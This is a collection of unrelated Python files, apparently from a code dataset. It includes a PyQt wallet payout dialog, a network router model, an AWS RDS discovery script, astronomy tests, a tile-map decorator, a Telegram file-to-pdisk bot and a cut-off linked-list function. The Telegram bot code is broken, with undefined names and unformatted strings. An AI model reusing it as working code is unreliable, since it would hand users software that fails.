self.lay_input.addWidget(self.sw_address_source)
self.btnLoadTransactions = QtWidgets.QPushButton(self.pnl_input)
self.btnLoadTransactions.setAutoDefault(False)
self.btnLoadTransactions.setObjectName("btnLoadTransactions")
self.lay_input.addWidget(self.btnLoadTransactions)
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.lay_input.addItem(spacerItem3)
self.verticalLayout_4.addLayout(self.lay_input)
self.verticalLayout.addWidget(self.pnl_input)
self.splitter = QtWidgets.QSplitter(SendPayoutDlg)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.main_widget = QtWidgets.QWidget(self.splitter)
self.main_widget.setObjectName("main_widget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.main_widget)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setSpacing(2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.lbl_message_2 = QtWidgets.QLabel(self.main_widget)
self.lbl_message_2.setText("")
self.lbl_message_2.setOpenExternalLinks(True)
self.lbl_message_2.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.lbl_message_2.setObjectName("lbl_message_2")
self.verticalLayout_2.addWidget(self.lbl_message_2)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setContentsMargins(-1, 8, -1, -1)
self.horizontalLayout_4.setSpacing(6)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.btnCheckAll = QtWidgets.QToolButton(self.main_widget)
self.btnCheckAll.setToolTip("")
self.btnCheckAll.setIconSize(QtCore.QSize(12, 12))
self.btnCheckAll.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.btnCheckAll.setObjectName("btnCheckAll")
self.horizontalLayout_4.addWidget(self.btnCheckAll)
self.btnUncheckAll = QtWidgets.QToolButton(self.main_widget)
self.btnUncheckAll.setToolTip("")
self.btnUncheckAll.setIconSize(QtCore.QSize(12, 12))
self.btnUncheckAll.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.btnUncheckAll.setObjectName("btnUncheckAll")
self.horizontalLayout_4.addWidget(self.btnUncheckAll)
self.chbHideCollateralTx = QtWidgets.QCheckBox(self.main_widget)
self.chbHideCollateralTx.setStyleSheet("")
self.chbHideCollateralTx.setObjectName("chbHideCollateralTx")
self.horizontalLayout_4.addWidget(self.chbHideCollateralTx)
self.lbl_message = QtWidgets.QLabel(self.main_widget)
self.lbl_message.setStyleSheet("margin-left:20px;\n"
"font-size:11px;\n"
"background-color: rgb(56, 181, 255);\n"
"color: rgb(255, 255, 255);")
self.lbl_message.setWordWrap(False)
self.lbl_message.setOpenExternalLinks(True)
self.lbl_message.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.lbl_message.setObjectName("lbl_message")
self.horizontalLayout_4.addWidget(self.lbl_message)
spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem4)
self.verticalLayout_2.addLayout(self.horizontalLayout_4)
self.tableView = QtWidgets.QTableView(self.main_widget)
self.tableView.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContentsOnFirstShow)
self.tableView.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.tableView.setShowGrid(True)
self.tableView.setSortingEnabled(False)
self.tableView.setObjectName("tableView")
self.tableView.verticalHeader().setVisible(False)
self.tableView.verticalHeader().setCascadingSectionResizes(True)
self.tableView.verticalHeader().setHighlightSections(False)
self.verticalLayout_2.addWidget(self.tableView)
self.dest_widget1 = QtWidgets.QWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.dest_widget1.sizePolicy().hasHeightForWidth())
self.dest_widget1.setSizePolicy(sizePolicy)
self.dest_widget1.setObjectName("dest_widget1")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.dest_widget1)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.dest_widget = QtWidgets.QFrame(self.dest_widget1)
self.dest_widget.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.dest_widget.setObjectName("dest_widget")
self.verticalLayout_3.addWidget(self.dest_widget)
self.verticalLayout.addWidget(self.splitter)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem5)
self.btnSend = QtWidgets.QPushButton(SendPayoutDlg)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnSend.sizePolicy().hasHeightForWidth())
self.btnSend.setSizePolicy(sizePolicy)
self.btnSend.setMinimumSize(QtCore.QSize(200, 0))
self.btnSend.setMaximumSize(QtCore.QSize(200, 16777215))
self.btnSend.setAutoDefault(False)
self.btnSend.setObjectName("btnSend")
self.horizontalLayout_3.addWidget(self.btnSend)
spacerItem6 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem6)
self.btnClose = QtWidgets.QPushButton(SendPayoutDlg)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnClose.sizePolicy().hasHeightForWidth())
self.btnClose.setSizePolicy(sizePolicy)
self.btnClose.setMinimumSize(QtCore.QSize(0, 0))
self.btnClose.setLayoutDirection(QtCore.Qt.LeftToRight)
self.btnClose.setAutoDefault(False)
self.btnClose.setObjectName("btnClose")
self.horizontalLayout_3.addWidget(self.btnClose, 0, QtCore.Qt.AlignRight)
self.verticalLayout.addLayout(self.horizontalLayout_3)
self.retranslateUi(SendPayoutDlg)
self.sw_address_source.setCurrentIndex(2)
QtCore.QMetaObject.connectSlotsByName(SendPayoutDlg)
def retranslateUi(self, SendPayoutDlg):
_translate = QtCore.QCoreApplication.translate
SendPayoutDlg.setWindowTitle(_translate("SendPayoutDlg", "Dialog"))
self.label_3.setText(_translate("SendPayoutDlg", "View as"))
self.cbo_address_source_mode.setItemText(0, _translate("SendPayoutDlg", "Wallet Account"))
self.cbo_address_source_mode.setItemText(1, _translate("SendPayoutDlg", "BIP32 Path"))
self.cbo_address_source_mode.setItemText(2, _translate("SendPayoutDlg", "Ghostnode Address"))
self.lbl_account.setText(_translate("SendPayoutDlg", "Account "))
self.btn_add_hw_account_nr.setToolTip(_translate("SendPayoutDlg", "Add new account number"))
self.btn_add_hw_account_nr.setText(_translate("SendPayoutDlg", "."))
self.lbl_hw_account_base_path.setText(_translate("SendPayoutDlg", "..."))
self.lblSourceBip32Path.setText(_translate("SendPayoutDlg", "BIP32 path"))
self.btn_src_bip32_path.setToolTip(_translate("SendPayoutDlg", "Change BIP32 path"))
self.btn_src_bip32_path.setText(_translate("SendPayoutDlg", "..."))
self.lbl_src_masternode.setText(_translate("SendPayoutDlg", "Ghostnode"))
self.btnLoadTransactions.setText(_translate("SendPayoutDlg", "Reload"))
self.btnCheckAll.setText(_translate("SendPayoutDlg", "Select All"))
self.btnUncheckAll.setText(_translate("SendPayoutDlg", "Unselect All"))
self.chbHideCollateralTx.setText(_translate("SendPayoutDlg", "Hide collateral utxos"))
self.lbl_message.setText(_translate("SendPayoutDlg", "...."))
self.btnSend.setText(_translate("SendPayoutDlg", "Prepare Transaction"))
self.btnClose.setText(_translate("SendPayoutDlg", "Close"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
SendPayoutDlg = QtWidgets.QDialog()
ui = Ui_SendPayoutDlg()
ui.setupUi(SendPayoutDlg)
SendPayoutDlg.show()
sys.exit(app.exec_())
|
nilq/baby-python
|
python
|
"""
==========================================================================
TorusRouterFL.py
==========================================================================
FL route unit that implements dimension order routing.
Author : Yanghui Ou
Date : June 30, 2019
"""
from pymtl3 import *
from .directions import *
from .RouteUnitDorFL import RouteUnitDorFL
class TorusRouterFL:
def __init__( s, pos_x, pos_y, ncols, nrows, dimension='y' ):
s.pos_x = pos_x
s.pos_y = pos_y
s.ncols = ncols
s.nrows = nrows
s.dimension = dimension
s.route_unit = RouteUnitDorFL( pos_x, pos_y, ncols, nrows, dimension='y' )
#-----------------------------------------------------------------------
# arrange_src_pkts
#-----------------------------------------------------------------------
# A helper function that puts each packet in [lst] into corresponding
# source.
def arrange_src_pkts( s, lst ):
src_pkts = [ [] for _ in range(5) ]
for pkt in lst:
if pkt.src_x == s.pos_x and pkt.src_y == s.pos_y:
in_dir = SELF
elif s.dimension == 'y':
src_x = pkt.src_x.uint()
src_y = pkt.src_y.uint()
dst_x = pkt.dst_x.uint()
dst_y = pkt.dst_y.uint()
# Same x - either comes from north or south
if src_x == s.pos_x:
north_dist = dst_y - src_y if dst_y > src_y else dst_y + s.nrows - src_y
south_dist = src_y - dst_y if dst_y < src_y else src_y + s.nrows - dst_y
in_dir = SOUTH if north_dist < south_dist else NORTH
# Different x - either comes from west or east
else:
east_dist = dst_x - src_x if dst_x > src_x else dst_x + s.ncols - src_x
west_dist = src_x - dst_x if dst_x < src_x else src_x + s.ncols - dst_x
in_dir = EAST if west_dist < east_dist else WEST
else: # s.dimension=='x'
# Same y - either comes from west or east
if src_x == s.pos_x:
east_dist = dst_x - src_x if dst_x > src_x else dst_x + s.ncols - src_x
west_dist = src_x - dst_x if dst_x < src_x else src_x + s.ncols - dst_x
in_dir = EAST if west_dist < east_dist else WEST
# Different y - either comes from north or south
else:
north_dist = dst_y - src_y if dst_y > src_y else dst_y + s.nrows - src_y
south_dist = src_y - dst_y if dst_y < src_y else src_y + s.nrows - dst_y
in_dir = SOUTH if north_dist < south_dist else NORTH
src_pkts[ in_dir ].append( pkt )
return src_pkts
#-----------------------------------------------------------------------
# route
#-----------------------------------------------------------------------
# Use FL route unit to route each packet in [src_pkts] to corresponding
# destination.
def route( s, src_pkts ):
assert len( src_pkts ) == 5
dst_pkts = [ [] for _ in range(5) ]
for pkts in src_pkts:
tmp = s.route_unit.route( pkts )
for i in range(5):
dst_pkts[i].extend( tmp[i] )
return dst_pkts
|
nilq/baby-python
|
python
|
import json
from common.methods import set_progress
from resourcehandlers.aws.models import AWSHandler
from botocore.client import ClientError
RESOURCE_IDENTIFIER = 'db_identifier'
def boto_instance_to_dict(boto_instance):
"""
Create a pared-down representation of an RDS instance from the full boto
dictionary.
"""
instance = {
'identifier': boto_instance['DBInstanceIdentifier'],
'engine': boto_instance['Engine'],
'status': boto_instance['DBInstanceStatus'],
'username': boto_instance['MasterUsername'],
}
# Endpoint may not be returned if networking is not set up yet
endpoint = boto_instance.get('Endpoint', {})
instance.update({
'address': endpoint.get('Address'),
'port': endpoint.get('Port')
})
return instance
def discover_resources(**kwargs):
discovered_rds_instances = []
for handler in AWSHandler.objects.all():
try:
wrapper = handler.get_api_wrapper()
set_progress('Connecting to Amazon RDS Instance for handler: {}'.format(handler))
except Exception as e:
set_progress(f"Could not get wrapper: {e}")
continue
for region in handler.current_regions():
rds = wrapper.get_boto3_client(
'rds',
handler.serviceaccount,
handler.servicepasswd,
region
)
try:
for instance in rds.describe_db_instances()['DBInstances']:
instance_dict = boto_instance_to_dict(instance)
discovered_rds_instances.append({
'db_identifier': instance['DBInstanceIdentifier'],
'aws_region': region,
'aws_rh_id': handler.id,
'rds_instance': json.dumps(instance_dict)
})
except ClientError as e:
set_progress('AWS ClientError: {}'.format(e))
continue
return discovered_rds_instances
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: Brian Cherinka, José Sánchez-Gallego, and Brett Andrews
# @Date: 2018-07-20
# @Filename: test_quantities.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
#
# @Last modified by: andrews
# @Last modified time: 2018-10-19 14:10:15
import matplotlib
import numpy
import pytest
from astropy import units as u
from tests import marvin_test_if
from marvin.tools.quantities import DataCube, Spectrum
spaxel_unit = u.Unit('spaxel', represents=u.pixel, doc='A spectral pixel', parse_strict='silent')
@pytest.fixture(scope='function')
def datacube():
"""Produces a simple 3D array for datacube testing."""
flux = numpy.tile([numpy.arange(1, 1001, dtype=numpy.float32)],
(100, 1)).T.reshape(1000, 10, 10)
ivar = (1. / (flux / 100))**2
mask = numpy.zeros(flux.shape, dtype=numpy.int)
wave = numpy.arange(1, 1001)
redcorr = numpy.ones(1000) * 1.5
mask[50:100, 5, 5] = 2**10
mask[500:600, 3, 3] = 2**4
scale = 1e-3
datacube = DataCube(flux, wave, ivar=ivar, mask=mask, redcorr=redcorr, scale=scale,
unit=u.erg / u.s / (u.cm ** 2) / u.Angstrom / spaxel_unit,
pixmask_flag='MANGA_DRP3PIXMASK')
yield datacube
@pytest.fixture(scope='function')
def spectrum():
"""Produces a simple 1D array for datacube testing."""
flux = numpy.arange(1, 1001, dtype=numpy.float32)
ivar = (1. / (flux / 100))**2
mask = numpy.zeros(flux.shape, dtype=numpy.int)
wave = numpy.arange(1, 1001)
mask[50:100] = 2**10
mask[500:600] = 2**4
scale = 1e-3
datacube = Spectrum(flux, wave, ivar=ivar, mask=mask, scale=scale,
unit=u.erg / u.s / (u.cm ** 2) / u.Angstrom / spaxel_unit,
pixmask_flag='MANGA_DRP3PIXMASK')
yield datacube
class TestDataCube(object):
def test_datacube(self, datacube):
assert datacube.value is not None
assert datacube.ivar is not None
assert datacube.mask is not None
numpy.testing.assert_array_equal(datacube.value.shape, datacube.ivar.shape)
numpy.testing.assert_array_equal(datacube.value.shape, datacube.mask.shape)
assert datacube.pixmask is not None
def test_masked(self, datacube):
assert isinstance(datacube.masked, numpy.ma.MaskedArray)
assert numpy.sum(datacube.masked.mask) == 50
datacube.pixmask_flag = None
assert numpy.sum(datacube.masked.mask) == 150
def test_snr(self, datacube):
assert datacube.snr[100, 5, 5] == pytest.approx(100)
def test_error(self, datacube):
numpy.testing.assert_almost_equal(datacube.error.value, numpy.sqrt(1 / datacube.ivar))
assert datacube.error.unit == datacube.unit
numpy.testing.assert_almost_equal(datacube.error.value, datacube.std.value)
def test_descale(self, datacube):
assert datacube.unit.scale == 1e-3
descaled = datacube.descale()
datacube.unit.scale == 1
numpy.testing.assert_almost_equal(descaled.value, datacube.value * datacube.unit.scale)
numpy.testing.assert_almost_equal(descaled.ivar, datacube.ivar / datacube.unit.scale**2)
def test_redcorr(self, datacube):
der = datacube.deredden()
assert isinstance(der, DataCube)
numpy.testing.assert_allclose(der.value, datacube.value * 1.5)
numpy.testing.assert_allclose(der.ivar, datacube.ivar / 1.5**2)
numpy.testing.assert_allclose(der.mask, datacube.mask)
assert der.redcorr is None
assert der.pixmask_flag == datacube.pixmask_flag
new_redcorr = (numpy.ones(1000) * 2.)
new_der = datacube.deredden(redcorr=new_redcorr)
numpy.testing.assert_allclose(new_der.value, datacube.value * 2)
numpy.testing.assert_allclose(new_der.ivar, datacube.ivar / 2**2)
datacube.redcorr = None
with pytest.raises(ValueError):
datacube.deredden()
def test_slice_datacube(self, datacube):
new_datacube = datacube[:, 3:5, 3:5]
assert isinstance(new_datacube, DataCube)
numpy.testing.assert_almost_equal(new_datacube.value, datacube.value[:, 3:5, 3:5])
numpy.testing.assert_almost_equal(new_datacube.ivar, datacube.ivar[:, 3:5, 3:5])
numpy.testing.assert_almost_equal(new_datacube.mask, datacube.mask[:, 3:5, 3:5])
numpy.testing.assert_almost_equal(new_datacube.redcorr, datacube.redcorr)
assert new_datacube.pixmask_flag == datacube.pixmask_flag
def test_slice_wave(self, datacube):
new_datacube = datacube[10:100]
assert isinstance(new_datacube, DataCube)
numpy.testing.assert_almost_equal(new_datacube.value, datacube.value[10:100, :, :])
numpy.testing.assert_almost_equal(new_datacube.ivar, datacube.ivar[10:100, :, :])
numpy.testing.assert_almost_equal(new_datacube.mask, datacube.mask[10:100, :, :])
numpy.testing.assert_almost_equal(new_datacube.redcorr, datacube.redcorr[10:100])
assert new_datacube.pixmask_flag == datacube.pixmask_flag
def test_slice_spectrum(self, datacube):
new_spectrum = datacube[:, 5, 5]
assert isinstance(new_spectrum, Spectrum)
numpy.testing.assert_almost_equal(new_spectrum.value, datacube.value[:, 5, 5])
numpy.testing.assert_almost_equal(new_spectrum.ivar, datacube.ivar[:, 5, 5])
numpy.testing.assert_almost_equal(new_spectrum.mask, datacube.mask[:, 5, 5])
assert new_spectrum.pixmask_flag == datacube.pixmask_flag
@marvin_test_if(mark='include', cube={'plateifu': '8485-1901',
'data_origin': 'file',
'initial_mode': 'local'})
def test_cube_quantities(self, cube):
assert cube.flux is not None
assert isinstance(cube.flux, numpy.ndarray)
assert isinstance(cube.flux, DataCube)
assert isinstance(cube.spectral_resolution, Spectrum)
if cube.release in ['MPL-4', 'MPL-5']:
with pytest.raises(AssertionError) as ee:
cube.spectral_resolution_prepixel
assert 'spectral_resolution_prepixel is not present in his MPL version' in str(ee)
else:
assert isinstance(cube.spectral_resolution_prepixel, Spectrum)
assert cube.flux.pixmask.values_to_bits(3) == [0, 1]
assert cube.flux.pixmask.values_to_labels(3) == ['NOCOV', 'LOWCOV']
@pytest.mark.parametrize('names, expected', [(['NOCOV', 'LOWCOV'], 3),
('DONOTUSE', 1024)])
def test_labels_to_value(self, cube, names, expected):
assert cube.flux.pixmask.labels_to_value(names) == expected
@marvin_test_if(mark='include', modelcube={'plateifu': '8485-1901',
'data_origin': 'file',
'initial_mode': 'local'})
def test_modelcube_quantities(self, modelcube):
for mc in modelcube.datamodel:
if hasattr(modelcube, mc.name):
modelcube_quantity = getattr(modelcube, mc.name)
assert isinstance(modelcube_quantity, DataCube)
assert modelcube_quantity.pixmask_flag == 'MANGA_DAPSPECMASK'
class TestSpectrum(object):
def test_spectrum(self, spectrum):
assert spectrum.value is not None
assert spectrum.ivar is not None
assert spectrum.mask is not None
numpy.testing.assert_array_equal(spectrum.value.shape, spectrum.ivar.shape)
numpy.testing.assert_array_equal(spectrum.value.shape, spectrum.mask.shape)
assert spectrum.pixmask is not None
def test_masked(self, spectrum):
assert isinstance(spectrum.masked, numpy.ma.MaskedArray)
assert numpy.sum(spectrum.masked.mask) == 50
spectrum.pixmask_flag = None
assert numpy.sum(spectrum.masked.mask) == 150
def test_snr(self, spectrum):
assert spectrum.snr[100] == pytest.approx(100)
def test_error(self, spectrum):
numpy.testing.assert_almost_equal(spectrum.error.value, numpy.sqrt(1 / spectrum.ivar))
assert spectrum.error.unit == spectrum.unit
numpy.testing.assert_almost_equal(spectrum.error.value, spectrum.std.value)
def test_descale(self, spectrum):
assert spectrum.unit.scale == 1e-3
descaled = spectrum.descale()
spectrum.unit.scale == 1
numpy.testing.assert_almost_equal(descaled.value, spectrum.value * spectrum.unit.scale)
numpy.testing.assert_almost_equal(descaled.ivar, spectrum.ivar / spectrum.unit.scale**2)
def test_slice_spectrum(self, spectrum):
new_spectrum = spectrum[10:100]
assert isinstance(new_spectrum, Spectrum)
numpy.testing.assert_almost_equal(new_spectrum.value, spectrum.value[10:100])
numpy.testing.assert_almost_equal(new_spectrum.ivar, spectrum.ivar[10:100])
numpy.testing.assert_almost_equal(new_spectrum.mask, spectrum.mask[10:100])
assert new_spectrum.pixmask_flag == spectrum.pixmask_flag
@marvin_test_if(mark='include', cube={'plateifu': '8485-1901',
'data_origin': 'file',
'initial_mode': 'local'})
def test_cube_quantities(self, cube):
for sp in cube.datamodel.spectra:
cube_quantity = getattr(cube, sp.name)
assert isinstance(cube_quantity, Spectrum)
assert cube_quantity.pixmask_flag is None
def test_plot(self, spectrum):
ax = spectrum.plot(show_std=True)
assert isinstance(ax, matplotlib.axes.Axes)
def test_plot_no_std_no_mask(self):
sp = Spectrum(numpy.random.randn(1000), wavelength=numpy.arange(1000))
sp.plot()
def test_plot_no_std(self):
mask = numpy.zeros(1000, dtype=numpy.int)
mask[50:100] = 2**10
mask[500:600] = 2**4
sp = Spectrum(
flux=numpy.random.randn(1000),
wavelength=numpy.arange(1000),
mask=mask,
pixmask_flag='MANGA_DRP3PIXMASK',
)
sp.plot()
def test_plot_no_mask(self):
flux = numpy.random.randn(1000)
ivar = (1. / (flux / 100))**2
sp = Spectrum(
flux=flux,
wavelength=numpy.arange(1000),
ivar=ivar,
)
sp.plot()
|
nilq/baby-python
|
python
|
from .orientationDictionary import OrientationDictionary
from copy import deepcopy
class RiverDecorator:
def updateCells(
self, matrix, WATER_SPRITE_INDEX, waterSpot, GROUND_SPRITE_INDEX, waterSprites
):
orientationDictionary = OrientationDictionary(waterSprites)
spriteDict = orientationDictionary.spriteDict
cornerDict = orientationDictionary.cornerDict
tempMatrix = deepcopy(matrix)
for spot in waterSpot:
row, column = spot
self.checkNeighbors(
row - 1,
column,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
spriteDict,
False,
)
self.checkNeighbors(
row + 1,
column,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
spriteDict,
False,
)
self.checkNeighbors(
row,
column - 1,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
spriteDict,
False,
)
self.checkNeighbors(
row,
column + 1,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
spriteDict,
False,
)
self.checkNeighbors(
row - 1,
column - 1,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
cornerDict,
True,
)
self.checkNeighbors(
row - 1,
column + 1,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
cornerDict,
True,
)
self.checkNeighbors(
row + 1,
column - 1,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
cornerDict,
True,
)
self.checkNeighbors(
row + 1,
column + 1,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
cornerDict,
True,
)
return tempMatrix
def checkNeighbors(
self,
row,
column,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
spriteDict,
corner,
):
if (
0 <= row < len(matrix)
and 0 <= column < len(matrix[0])
and matrix[row][column] != WATER_SPRITE_INDEX
):
cellInfo = [[0, 0, 0], [0, 1, 0], [0, 0, 0]]
self.fillCellInfo(cellInfo, row, column, matrix, WATER_SPRITE_INDEX, corner)
for spriteInfo in spriteDict:
if not corner:
if cellInfo in spriteInfo[0]:
tempMatrix[row][column] = spriteInfo[1]
else:
if cellInfo in spriteInfo:
tempMatrix[row][column] = spriteInfo[1]
def fillCellInfo(self, cellInfo, row, col, matrix, spriteToCheck, corner):
if (
0 <= row - 1 < len(matrix)
and 0 <= col < len(matrix[0])
and matrix[row - 1][col] == spriteToCheck
):
cellInfo[0][1] = 1
if (
0 <= row + 1 < len(matrix)
and 0 <= col < len(matrix[0])
and matrix[row + 1][col] == spriteToCheck
):
cellInfo[2][1] = 1
if (
0 <= row < len(matrix)
and 0 <= col + 1 < len(matrix[0])
and matrix[row][col + 1] == spriteToCheck
):
cellInfo[1][2] = 1
if (
0 <= row < len(matrix)
and 0 <= col - 1 < len(matrix[0])
and matrix[row][col - 1] == spriteToCheck
):
cellInfo[1][0] = 1
if corner:
if (
0 <= row - 1 < len(matrix)
and 0 <= col - 1 < len(matrix[0])
and matrix[row - 1][col - 1] == spriteToCheck
):
cellInfo[0][0] = 1
if (
0 <= row - 1 < len(matrix)
and 0 <= col + 1 < len(matrix[0])
and matrix[row - 1][col + 1] == spriteToCheck
):
cellInfo[0][2] = 1
if (
0 <= row + 1 < len(matrix)
and 0 <= col + 1 < len(matrix[0])
and matrix[row + 1][col + 1] == spriteToCheck
):
cellInfo[2][2] = 1
if (
0 <= row + 1 < len(matrix)
and 0 <= col - 1 < len(matrix[0])
and matrix[row + 1][col - 1] == spriteToCheck
):
cellInfo[2][0] = 1
|
nilq/baby-python
|
python
|
from telethon import TelegramClient, events, Button
import requests
import os
from pynpm import NPMPackage
from nodejs.bindings import node_run
import requests
import cryptg
import asyncio
import shutil
import subprocess
d = os.environ.get("d")
APP_ID = int(os.environ.get("APP_ID", 0))
API_HASH = os.environ.get("API_HASH", "")
BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
PDISK_API = os.environ.get("PDISK_API", "")
bot = Client('pdisk bot',
api_id=APP_ID,
api_hash=API_HASH,
bot_token=BOT_TOKEN,
workers=50,
sleep_threshold=0)
#=============================================================================================================================================
START_MSG = f"Hey {message.from_user.first_name} \n I Am A Pdisk Uploader Bot... \n I Can Upload Telegram Files/Direct Link And Return You Back With Pdisk Url..!! \n\n <b>Maintained by</b> : @RUBANDURAI27"
START_IMG = 'https://telegra.ph/file/29d4cbc0f511a7b73fa78.jpg'
HELP_MSG = "<b>Help Menu </b>\n\nJust Send Me An Direct Download Link To Upload That To Your PDisk ID. You Can Use /upload command to Get Direct Download Link For Telegram Video Files! \n\n <b>Available Commands </b>\n \n /help - How to use me \n /upload - File to Direct link \n /url - Link to Pdisk \n /telepdisk - File to Pdisk \n\n @POWERROCKERS"
#=============================================================================================================================================
@client.on(events.NewMessage(pattern='(?i)/start'))
async def handler(event):
chat = await event.get_chat()
await client.send_message(chat, "START_MSG")
await client.send_photo(chat, "START_IMG")
@client.on(events.NewMessage(pattern='/help'))
async def handler(event):
chat = await event.get_chat()
await client.send_message(chat, "HELP_MSG")
@client.on(events.NewMessage(pattern='/diskusage'))
async def handler(event):
chat = await event.get_chat()
stat = shutil.disk_usage("/app/templates/download")
await client.send_message(chat,str(stat))
@client.on(events.NewMessage(pattern='/url'))
async def handler(event):
link =event.text.split(' ')[1]
l =event.text.split(' ')[2]
chat = await event.get_chat()
s = f"http://linkapi.net/open/create_item?api_key={PDISK_API}&content_src={link}&link_type=link&title={l}"
r = requests.get(s).json()
z=r['data']["item_id"]
markup = client.build_reply_markup(Button.url("⚡ PDISK LINK ⚡",f"http://m.pdisk.net/share-video?videoid={z}"))
await client.send_message(chat, "𝐒𝐮𝐜𝐞𝐬𝐬𝐟𝐮𝐥𝐥𝐲 𝐏𝐫𝐨𝐜𝐞𝐬𝐬𝐞𝐝 𝐘𝐨𝐮𝐫 𝐑𝐞𝐪𝐮𝐞𝐬𝐭..! \n 𝙏𝙄𝙏𝙇𝙀 : {links} \n 𝙐𝙍𝙇 : <code>http://m.pdisk.net/share-video?videoid={z}</code> \n\n 𝙎𝙏𝘼𝙏𝙐𝙎 : <code>Processing...</code> \n\n Link Will Be Active Within 5-10 Mins..! \n\n @POWERROCKERS \n @TNFILMBOXOFFICIAL", buttons=markup)
@client.on(events.NewMessage(pattern='/telepdisk'))
async def handler(event):
chat = await event.get_chat()
print(chat)
dw = await event.get_reply_message()
links =event.text.split(" ")[1]
await client.send_message(chat,"DOWNLOADING PLZ ...")
ss=await dw.download_media(links)
shutil.move(f"/app/{links}",f"/app/templates/download/{links}")
await client.send_message(chat,f"wait few minutes ...{links}")
link =f"{d}/files/{links}"
#l =link.split('/')[-1]
l =event.text.split(' ')[1]
print(l)
s = f"http://linkapi.net/open/create_item?api_key={PDISK_API}&content_src={link}&link_type=link&title={l}"
r = requests.get(s).json()
m=dict(r)
print(m)
f=m['data']['item_id']
#r = requests.get(s).json()
#print(r)
#z=r['data']["item_id"]
# await event.delete()
# client.delete_messages()
markup = client.build_reply_markup(Button.url("⚡ PDISK LINK ⚡",f"http://m.pdisk.net/share-video?videoid={f}"))
await client.send_message(chat, "𝐒𝐮𝐜𝐞𝐬𝐬𝐟𝐮𝐥𝐥𝐲 𝐏𝐫𝐨𝐜𝐞𝐬𝐬𝐞𝐝 𝐘𝐨𝐮𝐫 𝐑𝐞𝐪𝐮𝐞𝐬𝐭..! \n 𝙏𝙄𝙏𝙇𝙀 : {links} \n 𝙐𝙍𝙇 : <code>http://m.pdisk.net/share-video?videoid={f}</code> \n\n 𝙎𝙏𝘼𝙏𝙐𝙎 : <code>Processing...</code> \n\n Link Will Be Active Within 5-10 Mins..! \n\n @POWERROCKERS \n @TNFILMBOXOFFICIAL ", buttons=markup)
#os.remove(f"/app/templates/download/{links}")
@client.on(events.NewMessage(pattern='(?i)/upload'))
async def handler(event):
chat = await event.get_chat()
print(chat)
dw = await event.get_reply_message()
links =event.text.split(" ")[1]
await client.send_message(chat,"⚡ PDISK LINK ⚡")
ss=await dw.download_media(links)
shutil.move(f"/app/{links}",f"/app/templates/download/{links}")
await client.send_message(chat,f"{d}/files/{links}")
if os.path.exists(f"/app/Download/{chat.username}"):
await client.send_message(chat,"downloading")
ss=await dw.download_media()
await client.send_message(chat,f"{d}/u?url={ss}")
client.start()
client.run_until_disconnected()
|
nilq/baby-python
|
python
|
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, val=0, next=None):
self.val = val
self.next = next
def swapPairs(head):
"""
:type head: ListNode
:rtype: ListNode
"""
dummy = ListNode(-1)
prev, current = dummy, head;
dummy.next = head
while current and current.next:
prev.next = current.next
